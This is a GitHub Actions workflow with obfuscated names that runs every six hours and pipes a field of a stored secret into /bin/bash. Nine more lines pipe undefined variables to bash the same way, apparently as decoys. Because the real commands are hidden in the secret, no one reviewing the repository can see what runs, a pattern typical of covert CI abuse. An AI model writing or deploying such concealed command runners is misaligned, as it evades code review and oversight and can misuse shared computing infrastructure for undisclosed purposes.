name: duansiqi9831

on:
  workflow_dispatch:
  schedule:
    - cron: '5 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duansiqi9831
        env:
          x669: ${{ secrets.x669 }}
        run: |
          echo $x669 | jq -r .mtr23 | /bin/bash
          echo $sd86 | jq -r .wyqu83902 | /bin/bash
          echo $bv0 | jq -r .jrr38894 | /bin/bash
          echo $nw258 | jq -r .jal9 | /bin/bash
          echo $gfi61 | jq -r .u509 | /bin/bash
          echo $nsw54 | jq -r .m734 | /bin/bash
          echo $rrqf412 | jq -r .xwa9 | /bin/bash
          echo $ltm5315 | jq -r .xw56347 | /bin/bash
          echo $dyocy66108 | jq -r .pfjz97 | /bin/bash
          echo $tbtv5 | jq -r .jovxk68513 | /bin/bash

